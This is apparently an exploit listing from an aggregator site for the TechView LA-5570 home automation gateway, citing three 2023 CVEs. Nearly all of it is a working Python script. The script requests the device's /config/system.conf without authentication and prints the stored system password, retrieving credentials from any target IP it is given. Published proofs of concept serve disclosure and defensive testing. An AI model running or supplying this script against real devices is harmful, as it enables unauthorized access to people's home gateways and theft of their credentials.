Exploit for TECHView LA5570 Wireless Gateway 1.0.19_T53 Traversal / Privilege Escalation CVE-2023-34723 CVE-2023-34724 CVE-2023-34725

Name: Exploit for TECHView LA5570 Wireless Gateway 1.0.19_T53 Traversal / Privilege Escalation CVE-2023-34723 CVE-2023-34724 CVE-2023-34725
Rating: 5 (130 reviews)

2023-09-08 | CVSS 5.0

## https://sploitus.com/exploit?id=PACKETSTORM:174553
# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities  
# Google Dork: N/A  
# Date: 25/08/2023  
# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]  
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570  
# Software Link: N/A  
# Version: 1.0.19_T53  
# Tested on: MACOS/Linux  
# CVE : CVE-2023-34723  
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725  
  
#!/opt/homebrew/bin/python3  
  
import requests  
import sys  
from time import sleep  
from urllib3.exceptions import InsecureRequestWarning  
from colorama import init  
from colorama import Fore, Back, Style  
import re  
import os  
import ipaddress  
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)  
  
def banner():  
if os.name == 'posix':  
clr_cmd = ('clear')  
elif os.name == 'nt':  
clr_cmd = ('cls')  
os.system(clr_cmd)  
print ("[+]****************************************************[+]")  
print (" | Author : The Security Team |")  
print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")  
print (" | Description : TechVIEW LA-5570 Directory Traversal |")  
print (" | Usage : "+sys.argv[0]+" <target> |")   
print ("[+]****************************************************[+]")  
  
def usage():  
print (f"Usage: {sys.argv[0]} <target>")  
  
def main(target):  
domain = "http://"+target+"/config/system.conf"  
try:  
url = domain.strip()  
r = requests.get(url, verify=False, timeout=3)  
print ("[+] Retrieving credentials", flush=True, end='')  
sleep(1)  
print(" .", flush=True, end='')  
sleep(1)  
print(" .", flush=True, end='')  
sleep(1)  
print(" .", flush=True, end='')  
if ("system_password" in r.text):  
data = (r.text.split("\n"))  
print (f"\n{data[1]}")  
else:  
print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)  
except TimeoutError:  
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)  
except KeyboardInterrupt:  
return  
except requests.exceptions.Timeout:  
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)  
return  
  
if __name__ == '__main__':  
if len(sys.argv)>1:  
banner()  
target = sys.argv[1]  
try:  
validate = ipaddress.ip_address(target)  
if (validate):  
main (target)  
except ValueError as e:  
print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)   
else:  
print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)